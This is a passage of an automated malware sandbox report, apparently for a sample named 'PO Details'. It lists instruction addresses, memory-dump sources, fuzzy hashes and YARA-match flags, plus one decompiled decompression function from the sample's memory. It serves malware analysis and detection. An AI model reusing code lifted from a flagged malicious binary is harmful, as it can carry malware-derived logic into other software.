0x004070ac
0x004070ac
0x004070b0
0x00000000
0x00000000
0x004070b6
0x004070b6
0x004070b9
0x004070bc
0x004070bf
0x004070c1
0x004070c3
0x004070c6
0x004070c9
0x004070c9
0x004070c9
0x004070d0
0x004070d0
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e5
0x004070e8
0x004070ea
0x004070ed
0x004070f0
0x0040710a
0x0040710a
0x0040710d
0x00000000
0x00000000
0x00407113
0x00407113
0x00407116
0x0040711d
0x00000000
0x0040711d
0x004070f2
0x004070f5
0x004070fc
0x004070ff
0x00000000
0x00000000
0x00407125
0x00407125
0x0040714a
0x0040714a
0x0040714a
0x0040714c
0x00000000
0x00000000
0x0040712a
0x0040712a
0x0040712e
0x00000000
0x00000000
0x00407134
0x00407134
0x00407137
0x0040713a
0x0040713d
0x0040713f
0x00407141
0x00407144
0x00407147
0x00407147
0x00407147
0x0040714e
0x00407156
0x00407159
0x0040715c
0x0040715e
0x00407161
0x00407161
0x00407163
0x00000000
0x00000000
0x00407169
0x00407169
0x0040716c
0x00407171
0x00407173
0x00407179
0x0040717b
0x00407190
0x00407192
0x00407192
0x0040717d
0x00407183
0x00407185
0x00407187
0x00407187
0x00407194
0x00407198
0x0040719b
0x004071a1
0x004071a1
0x004071a4
0x004071a4
0x004071a4
0x004071a6
0x00000000
0x00000000
0x004071ac
0x004071ac
0x004071b2
0x004071b4
0x004071d9
0x004071dc
0x004071e2
0x004071e7
0x004071ed
0x004071f3
0x004071f5
0x004071f8
0x00407201
0x00407207
0x00407207
0x004071fa
0x004071fc
0x004071fe
0x004071fe
0x00407209
0x0040720f
0x00407211
0x00407214
0x00407216
0x0040721c
0x0040721e
0x00407220
0x00407222
0x00407224
0x00407227
0x00407230
0x00407233
0x00407233
0x00407229
0x00407229
0x0040722c
0x0040722c
0x00407227
0x0040721e
0x00407235
0x00407237
0x00000000
0x00000000
0x00000000
0x00000000
0x00407237
0x004071b6
0x004071b6
0x004071bc
0x004071c2
0x004071c4
0x00000000
0x00000000
0x004071c6
0x004071c6
0x004071c8
0x004071ca
0x004071d3
0x004071d3
0x004071cc
0x004071cc
0x004071cf
0x004071cf
0x004071d5
0x004071d7
0x00000000
0x00000000
0x0040723d
0x0040723d
0x00407242
0x00407244
0x00407245
0x00407246
0x00407247
0x0040724d
0x00407250
0x00407253
0x00407256
0x00407258
0x0040725e
0x0040725e
0x00407261
0x00407261
0x00407261
0x00407261
0x0040726a
0x00000000
0x00000000
0x0040726f
0x0040726f
0x00407272
0x00407275
0x00407277
0x0040730e
0x0040730e
0x00407311
0x00407313
0x00407314
0x00407315
0x00407318
0x00000000
0x00407318
0x0040727d
0x0040727d
0x00407283
0x00407285
0x004072aa
0x004072ad
0x004072b3
0x004072b8
0x004072be
0x004072c4
0x004072c6
0x004072c9
0x004072d2
0x004072d8
0x004072d8
0x004072cb
0x004072cd
0x004072cf
0x004072cf
0x004072da
0x004072e0
0x004072e2
0x004072e5
0x004072e7
0x004072ed
0x004072ef
0x004072f1
0x004072f3
0x004072f5
0x004072f8
0x00407301
0x00407304
0x00407304
0x004072fa
0x004072fa
0x004072fd
0x004072fd
0x004072f8
0x004072ef
0x00407306
0x00407308
0x00000000
0x00000000
0x00000000
0x00000000
0x00407308
0x00407287
0x00407287
0x0040728d
0x00407293
0x00407295
0x00000000
0x00000000
0x00407297
0x00407297
0x00407299
0x0040729b
0x004072a2
0x004072a2
0x004072a4
0x0040729d
0x0040729d
0x0040729f
0x0040729f
0x004072a6
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407320
0x00407320
0x00407323
0x00407325
0x00407328
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x00000000
0x00000000
0x00000000
0x004069d9
0x004069bd
0x00000000
0x004069c3
0x004069c6
0x004069d0
0x004069d3
0x004069d6
0x00000000
0x004069d6
0x004069bd
0x004069e1
0x004069e4
0x004069e8
0x004069f2
0x004069fc
0x004069ff
0x00406a05
0x00406b39
0x00406b3b
0x00406b41
0x00406b44
0x00406b47
0x00000000
0x00406b47
0x00406a0b
0x00406a0b
0x00406a0c
0x00406a64
0x00406a64
0x00406a6b
0x00406b11
0x00406b11
0x00406b16
0x00406b19
0x00406b1e
0x00406b21
0x00406b26
0x00406b29
0x00406b2e
0x00406b31
0x00406b31
0x00000000
0x00406a71
0x00406a71
0x00406a71
0x00406a71
0x00406a75
0x00406a75
0x00406a97
0x00406a9a
0x00406a9c
0x00406a9f
0x00406aa4
0x00406a7a
0x00406a7a
0x00406a7f
0x00406a81
0x00406a83
0x00406a88
0x00406a8e
0x00406a93
0x00406a95
0x00406a95
0x00406a8a
0x00406a8a
0x00406a8a
0x00406a88
0x00000000
0x00406aa6
0x00406ad3
0x00406ad8
0x00406ada
0x00406adb
0x00406add
0x00406ade
0x00406ade
0x00406ade
0x00406b06
0x00406b0b
0x00406b0b
0x00000000
0x00406b0b
0x00406aa4
0x00406a6b
0x00406a0e
0x00406a0e
0x00406a0f
0x00406a59
0x00000000
0x00406a59
0x00406a11
0x00406a12
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b6e
0x00406b6e
0x00406b6e
0x00406b71
0x00000000
0x00000000
0x00406b4e
0x00406b4e
0x00406b52
0x00000000
0x00000000
0x00406b58
0x00406b58
0x00406b5b
0x00406b5e
0x00406b63
0x00406b65
0x00406b68
0x00406b6b
0x00406b6b
0x00406b6b
0x00406b73
0x00406b73
0x00406b76
0x00406b78
0x00406b7d
0x00406b80
0x00406b82
0x00406b85
0x00000000
0x00000000
0x00406b8b
0x00406b8b
0x00406b8d
0x00000000
0x00000000
0x00406b93
0x00406b93
0x00406b97
0x00000000
0x00000000
0x00406b9d
0x00406b9d
0x00406ba0
0x00406ba2
0x00406c40
0x00406c40
0x00406c43
0x00406c45
0x00406c45
0x00406c48
0x00406c4b
0x00406c4d
0x00406c4f
0x00406c51
0x00406c51
0x00406c5a
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c6e
0x00406c74
0x00406c74
0x00406c7a
0x00406c7a
0x00406c7a
0x00000000
0x00406c6e
0x00406ba8
0x00406ba8
0x00406bae
0x00406bb1
0x00406bb3
0x00406bde
0x00406be1
0x00406be7
0x00406bec
0x00406bf2
0x00406bf8
0x00406bfa
0x00406bfd
0x00406c06
0x00406c0c
0x00406c0c
0x00406bff
0x00406c01
0x00406c03
0x00406c03
0x00406c0e
0x00406c14
0x00406c17
0x00406c19
0x00406c1b
0x00406c21
0x00406c23
0x00406c25
0x00406c28
0x00406c31
0x00406c31
0x00406c33
0x00406c2a
0x00406c2a
0x00406c2d
0x00406c2d
0x00406c35
0x00406c35
0x00406c23
0x00406c38
0x00406c3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c3a
0x00406bb5
0x00406bb5
0x00406bbb
0x00406bc1
0x00406bc3
0x00000000
0x00000000
0x00406bc5
0x00406bc5
0x00406bc7
0x00406bc9
0x00406bcc
0x00406bd3
0x00406bd3
0x00406bd5
0x00406bce
0x00406bce
0x00406bd0
0x00406bd0
0x00406bd7
0x00406bd9
0x00406bdc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ce0
0x00406ce3
0x00406ce6
0x00406cec
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ec3
0x00406ec3
0x00406ec3
0x00406ec6
0x00406ec9
0x00406ecb
0x00406ece
0x00406ed4
0x00406edb
0x00406edd
0x00000000
0x00000000
0x00406db1
0x00406db1
0x00406dd9
0x00406dd9
0x00406dd9
0x00406ddb
0x00000000
0x00000000
0x00406db9
0x00406db9
0x00406dbd
0x00000000
0x00000000
0x00406dc3
0x00406dc3
0x00406dc6
0x00406dc9
0x00406dcc
0x00406dce
0x00406dd0
0x00406dd3
0x00406dd6
0x00406dd6
0x00406dd6
0x00406ddd
0x00406ddd
0x00406de5
0x00406de8
0x00406dee
0x00406df1
0x00406df5
0x00406df9
0x00406dfc
0x00406dff
0x00406e17
0x00406e17
0x00406e1a
0x00406e28
0x00406e2b
0x00406e1c
0x00406e1c
0x00406e1e
0x00406e25
0x00406e25
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e59
0x00000000
0x00000000
0x00406e34
0x00406e34
0x00406e38
0x00000000
0x00000000
0x00406e3e
0x00406e3e
0x00406e41
0x00406e44
0x00406e47
0x00406e49
0x00406e4b
0x00406e4e
0x00406e51
0x00406e51
0x00406e51
0x00406e5b
0x00406e5b
0x00406e5d
0x00406e5f
0x00406e6a
0x00406e6d
0x00406e70
0x00406e72
0x00406e74
0x00406e76
0x00406e79
0x00406e7c
0x00406e81
0x00406e84
0x00406e87
0x00406e8a
0x00406e91
0x00406e94
0x00406e96
0x00000000
0x00000000
0x00406e9c
0x00406e9c
0x00406ea0
0x00406eb1
0x00406eb1
0x00406eb1
0x00406eb3
0x00406eb3
0x00406eb7
0x00406eb7
0x00406eb7
0x00406eb9
0x00406eba
0x00406ebd
0x00406ebd
0x00406ebd
0x00406ec0
0x00000000
0x00406ec0
0x00406ea2
0x00406ea2
0x00406ea5
0x00000000
0x00000000
0x00406eab
0x00406eab
0x00000000
0x00406eab
0x00406e01
0x00406e01
0x00406e03
0x00406e05
0x00406e08
0x00406e0b
0x00406e0f
0x00406e0f
0x00406ee3
0x00406ee3
0x00406ee6
0x00406eed
0x00406ef1
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efe
0x00406f01
0x00406f03
0x00406f04
0x00406f07
0x00406f12
0x00406f15
0x00406f2c
0x00406f31
0x00406f38
0x00406f3d
0x00406f41
0x00406f43
0x00406f43
0x00406f43
0x00406f46
0x00406f48
0x00000000
0x00406f4e
0x00406f4e
0x00406f52
0x00406f5d
0x00406f70
0x00406f75
0x00406f7a
0x00406f7c
0x00000000
0x00000000
0x00406f82
0x00406f82
0x00406f85
0x00406f87
0x00406f95
0x00406f95
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa7
0x00406faa
0x00000000
0x00406faa
0x00406f89
0x00406f89
0x00406f8f
0x00000000
0x00000000
0x00000000
0x00406f8f
0x00000000
0x00000000
0x00000000
0x0040732e
0x0040732e
0x00407334
0x0040733a
0x0040733f
0x00407345
0x0040734b
0x0040734d
0x00407350
0x00407359
0x0040735f
0x0040735f
0x00407352
0x00407354
0x00407356
0x00407356
0x00407361
0x00407363
0x00407366
0x004073a1
0x004073a1
0x00000000
0x00407368
0x00407368
0x00407368
0x0040736e
0x00407371
0x00407373
0x004073a8
0x004073aa
0x00000000
0x004073aa
0x00000000
0x00407373
0x00000000
0x004069b2
0x00407380
0x00000000
0x00407380
0x00406d94
0x00406d96
0x00000000
0x00000000
0x00406d98
0x00406d98
0x00406d9b
0x00000000
0x00406d9b
0x00406ce0
0x00406ca1
0x00407385
0x00407388
0x0040738a
0x00407393
0x00407399
0x00000000

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 1f017aaef81dd0f0ed7cb9892c5a428a4034ef251f890bfd5ca3fce11066bb94
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: 8FE1AA71A04709DFDB24CF58C880BAEB7F5EB45305F15842EE896AB2D1D738AA91CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02A814F7 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c81ba2d747ad239febe21dbc4db10dfe50325d908ac1d0711446c2071f42b9d
Instruction ID: a3936f5acc1a837ffc41e83a9d3c465174894e606cb188c90e1e2b9242b60c17
Opcode Fuzzy Hash: 7c81ba2d747ad239febe21dbc4db10dfe50325d908ac1d0711446c2071f42b9d
Instruction Fuzzy Hash: 9661AF67E2E315C9EB933170C6503E1A9A1DF23C82D618B679C3B719617F1B498F84C5

Uniqueness

Uniqueness Score: -1.00%

Function 02A813EF Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef0243152225076f94577f0a06054b5180c39090b073fe9d59ebd849806bcc0
Instruction ID: f4eefb1e5ef407ae8f85df3b783c162c0dc20117287f7504d8e2cedaee1cfe8c
Opcode Fuzzy Hash: bef0243152225076f94577f0a06054b5180c39090b073fe9d59ebd849806bcc0
Instruction Fuzzy Hash: D671A0A3E2D315C8DB933170C6503F1A9A1DF23992D618B67983B719A17F1B4A8F84C4

Uniqueness

Uniqueness Score: -1.00%

Function 02A92CAD Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c934b9eb319d7afb7608024fc7ad8c509ce51796c9228b1e167c2366cd0e4d
Instruction ID: 4a311565483cc6693e0eeb71d9bec323c0f8a0e2e5d8c4db04f172733dc19202
Opcode Fuzzy Hash: 59c934b9eb319d7afb7608024fc7ad8c509ce51796c9228b1e167c2366cd0e4d
Instruction Fuzzy Hash: 1481CB7213CE595FE70CDF39D8CA52A37E7FA92120395808ED042C76ABF976E8478215

Uniqueness

Uniqueness Score: -1.00%

Function 02A812DD Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7dd0e18100e87d4be2a98f7c17a180431a3d5f6944017b77ae6556327af20c0
Instruction ID: 7f76bb526a39626ffac5f0dd6f54fd92e716cf94ab95a9c863f0296a6039def6
Opcode Fuzzy Hash: b7dd0e18100e87d4be2a98f7c17a180431a3d5f6944017b77ae6556327af20c0
Instruction Fuzzy Hash: D9818EA7E2E315C8EB933171C6503F1A9A1DF23992D618B67983B719A13F1F4A4F84C4

Uniqueness

Uniqueness Score: -1.00%

Function 02A81452 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a536a9f98a76807bf26ac1e415238eebec087e0a140dcad15e11bdc7e41092f
Instruction ID: d9cb5a90f95a2185a403c7a7b0e7442f00683c2453961ff8bc6ae0ecb53bbfaa
Opcode Fuzzy Hash: 9a536a9f98a76807bf26ac1e415238eebec087e0a140dcad15e11bdc7e41092f
Instruction Fuzzy Hash: AB619F67E2E315C8EB933170C6503F1A9A1DF23D82D618B67983B719A17F1B498F84C4

Uniqueness

Uniqueness Score: -1.00%

Function 00407458 Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00407458(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407463
0x0040746b
0x0040746f
0x00407471
0x00407474
0x00407476
0x00407476
0x00407478
0x0040747f
0x00407481
0x00407481
0x00407487
0x0040749c
0x004074a4
0x004074a6
0x004074a8
0x004074ab
0x004074ac
0x004074ac
0x004074b2
0x00000000
0x00000000
0x004074b4
0x004074b7
0x00000000
0x00000000
0x00000000
0x004074b7
0x004074bb
0x004074be
0x004074c0
0x004074c0
0x004074c3
0x004074c9
0x004074ca
0x00000000
0x00000000
0x00000000
0x004074ca
0x004074cf
0x004074d2
0x004074d4
0x004074d4
0x004074da
0x004074dc
0x004074ed
0x004074e0
0x004074e4
0x00407789
0x00000000
0x00407789
0x004074ea
0x004074eb
0x004074eb
0x004074f3
0x004074f6
0x004074fa
0x004074fc
0x004074fe
0x00407501
0x00000000
0x00000000
0x00407509
0x0040750f
0x00407511
0x00407513
0x00407514
0x00407529
0x00407529
0x0040752c
0x0040752e
0x0040752e
0x00407530
0x00407535
0x00407537
0x0040753e
0x00407540
0x00407548
0x00407548
0x0040754a
0x0040754b
0x0040755a
0x0040755e
0x00407562
0x00407565
0x00407568
0x0040756d
0x00407570
0x00407576
0x0040757d
0x00407583
0x0040777c
0x0040777c
0x00407781
0x00407790
0x00000000
0x00000000
0x00000000
0x00407781
0x00407590
0x00407593
0x00407596
0x00407599
0x0040759d
0x00000000
0x00000000
0x004075a8
0x004075ab
0x004075ac
0x004075ae
0x004075b4
0x004075b7
0x00000000
0x00000000
0x004075bd
0x004075be
0x004075c1
0x004075c4
0x004075c7
0x004075cd
0x004075cf
0x004075cf
0x004075d7
0x004075db
0x004075e0
0x00407605
0x0040760b
0x0040760d
0x0040760f
0x00407612
0x0040761b
0x00000000
0x00000000
0x004075e2
0x004075e2
0x004075eb
0x004075ef
0x00000000
0x00000000
0x00407600
0x00407600
0x00407603
0x00000000
0x00000000
0x004075f3
0x004075f6
0x004075f8
0x004075fc
0x00000000
0x00000000
0x004075fe
0x004075fe
0x00000000
0x00407600
0x00407624
0x0040762a
0x00407634
0x00407636
0x0040763b
0x0040763d
0x00407673
0x0040763f
0x0040763f
0x00407642
0x00407645
0x0040764f
0x00407652
0x00407659
0x00407664
0x0040766b
0x0040766b
0x00407675
0x00407678
0x0040767a
0x00407680
0x00407680
0x00407689
0x0040768c
0x00407691
0x004076a0
0x004076a8
0x004076ad
0x004076d1
0x004076d9
0x004076dd
0x004076e3
0x004076af
0x004076bd
0x004076c0
0x004076c6
0x004076c6
0x004076e7
0x004076a2
0x004076a2
0x004076a2
0x004076f8
0x004076fc
0x00407708
0x00407703
0x00407706
0x00407706
0x00407710
0x00407715
0x0040771d
0x00407719
0x0040771b
0x0040771b
0x00407723
0x00407725
0x0040772c
0x00407736
0x00407740
0x0040775c
0x00407760
0x004075a5
0x004075ab
0x004075ac
0x004075ae
0x004075b4
0x004075b7
0x00000000
0x00000000
0x00000000
0x004075b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00407742
0x00407742
0x00407742
0x00407747
0x00407750
0x00407759
0x00000000
0x00407759
0x00407766
0x00407766
0x00407769
0x00407770
0x00407773
0x00000000
0x00407596
0x00407516
0x00407518
0x00407518
0x0040751c
0x0040751f
0x00407520
0x00407520
0x00000000
0x00407518
0x0040748c
0x00407492
0x00000000

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
